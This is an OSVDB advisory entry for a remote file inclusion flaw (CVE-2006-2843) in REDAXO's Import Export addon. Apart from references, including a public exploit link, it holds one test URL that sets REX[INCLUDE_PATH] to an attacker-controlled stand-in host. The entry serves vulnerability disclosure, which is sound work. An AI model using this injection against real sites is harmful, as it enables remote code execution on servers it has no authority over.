REDAXO Import Export Addon index.inc.php REX[INCLUDE_PATH] Variable Remote File Inclusion

2006-06-01T09:05:16
ID OSVDB:25958
Type osvdb
Reporter OSVDB
Modified 2006-06-01T09:05:16

Description

Manual Testing Notes

./redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=attacker

References:

Vendor URL: http://www.redaxo.de/
Secunia Advisory ID: 20408
Secunia Advisory ID: 20395
Related OSVDB ID: 25959
Related OSVDB ID: 25955
Related OSVDB ID: 25957
Related OSVDB ID: 25956
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-05/0730.html
Generic Exploit URL: http://milw0rm.com/exploits/1861
FrSIRT Advisory: ADV-2006-2109
CVE-2006-2843